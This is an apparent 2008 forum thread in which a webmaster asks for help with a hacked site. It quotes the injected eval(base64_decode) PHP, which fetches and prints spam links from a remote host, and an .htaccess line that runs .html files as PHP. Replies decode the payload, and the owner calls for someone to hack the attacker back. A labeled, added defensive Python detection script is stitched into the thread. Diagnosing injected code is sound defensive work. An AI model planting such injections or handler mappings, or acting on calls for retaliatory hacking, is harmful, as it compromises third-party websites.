GoFuckYourself.com - Adult Webmaster Forum


NetHorse 07-10-2008 07:42 AM

Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!!
 
<!--erda8--><?php eval(base64_decode("JGw9Imh0dHA6Ly9kbWkuZXJkYXVkdG VhbS5iaXovbGluay9saW5rLnBocCI7IGlmIChleHRlbnNpb25f bG9hZGVkKCJjdXJsIikpey ANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gs IENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2 gsIENVUkxPUFRfUkVUVVJO VFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE 9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3Vy bF9jbG9zZSgkY2gpO30NCm Vsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBA JHI7DQo=")); ?>

Someone gained access to one of my sites that promotes a nats program and added that little script. Any idea what that means or what it was possibly doing? Thanks to anyone out there who can help.

DarkJedi 07-10-2008 07:46 AM

It means you need to move to a new host that doesn't have a head up their ass.

NetHorse 07-10-2008 07:53 AM

Also found this in all my .htaccess files


AddHandler application/x-httpd-php .html .htm .shtm

and huge spam list linking to this site

http://www.evolutionisdead.com/

????????

darksoul 07-10-2008 07:56 AM

Code:

$l = "http://dmi.erdaudteam.biz/link/link.php";
if (extension_loaded("curl")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $l);
    $r = curl_exec($ch);
    curl_close($ch);
} else {
    $r = implode("", file($l));
}
print @$r;

beta-tester 07-10-2008 07:56 AM

it means that it'll execute this statement:

$l="http://dmi.erdaudteam.biz/link/link.php"; if (extension_loaded("curl")){
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode("",file($l));} print @$r;


if it helps :)

darksoul 07-10-2008 08:02 AM

basically it loads the list with spammed URLs from dmi.erdaudteam.biz/link/link.php
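
Added example, not part of the thread: a Python triage sketch for the two artifacts reported above, the `eval(base64_decode(...))` injection and the `.htaccess` handler line. It decodes the payload without executing it, lists the remote URLs it fetches, and flags static extensions mapped to PHP. The function names and the `collector.example.invalid` sample are constructed for illustration.

```python
import base64
import re

# Matches eval(base64_decode("...")) and captures the encoded argument.
# Whitespace is allowed inside the blob because line wrapping often adds it.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']', re.I)
# AddHandler/AddType lines that hand file extensions to a PHP handler.
HTACCESS_PHP = re.compile(r'^\s*(AddHandler|AddType)\s+\S*php\S*\s+(.*)$', re.I | re.M)
STATIC_EXT = {".html", ".htm", ".shtm", ".shtml"}
URL = re.compile(r'https?://[^\s"\'<>)]+')


def decode_injections(text):
    """Decode every eval(base64_decode(...)) argument in text; never runs it."""
    out = []
    for m in EVAL_B64.finditer(text):
        blob = re.sub(r"\s+", "", m.group(1))  # drop wrapping whitespace
        try:
            out.append(base64.b64decode(blob, validate=True).decode("latin-1"))
        except ValueError:
            out.append(None)  # not valid base64: leave for manual review
    return out


def remote_urls(payload):
    """URLs the decoded payload references (what the injected code pulls in)."""
    return URL.findall(payload or "")


def htaccess_php_on_static(text):
    """Static extensions that an .htaccess maps to a PHP handler."""
    hits = []
    for m in HTACCESS_PHP.finditer(text):
        hits += [e for e in m.group(2).split() if e.lower() in STATIC_EXT]
    return hits


# Constructed sample input: a harmless stand-in payload, encoded and space-wrapped.
PAYLOAD = '$l="http://collector.example.invalid/link.php"; print @implode("",file($l));'
BLOB = base64.b64encode(PAYLOAD.encode()).decode()
WRAPPED = " ".join(BLOB[i:i + 22] for i in range(0, len(BLOB), 22))
SAMPLE_PHP = '<!--marker--><?php eval(base64_decode("%s")); ?>' % WRAPPED
SAMPLE_HTACCESS = "AddHandler application/x-httpd-php .html .htm .shtm\n"

if __name__ == "__main__":
    for p in decode_injections(SAMPLE_PHP):
        print(p, remote_urls(p))
    print(htaccess_php_on_static(SAMPLE_HTACCESS))
```

Run the three functions over every file under the web root; a hit in an `.html` file only executes when the handler line is also present, so the two findings should be cleaned up together.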

NetHorse 07-10-2008 08:06 AM

Thanks a lot guys I'll try to get a hold of this guy's host and have him shut down

NetHorse 07-10-2008 08:30 AM

estdomains.com is the domain the site is hosted on!

NetHorse 07-10-2008 08:35 AM

If they don't do anything about it can I contact ICANN? I want this asshole's site SHUT DOWN!!!!!!!!!!!!:mad::mad::mad::mad::mad::mad::mad::mad::mad::mad::mad::mad::mad:

tahiti 07-10-2008 09:17 AM

So easy, it was some base64 encoding.

--->aWYgeW91IG5lZWQgaGVscCBjaGVjayBteSBzaWcuLi4gSSBnd WVzcyB5b3UgY2FuJ3QgcmVhZCB0aGF0IDstKQ==

NetHorse 07-10-2008 09:42 AM

blah someone hack his site. POS really fucked one of my rankings with one site. :321GFY

Juicy D. Links 07-10-2008 09:46 AM

That's some nice code

NetHorse 07-11-2008 12:09 AM

Quote:

Originally Posted by Juicy D. Links (Post 14444821)
That's some nice code

? Meaning these are talented hackers?


All times are GMT -7.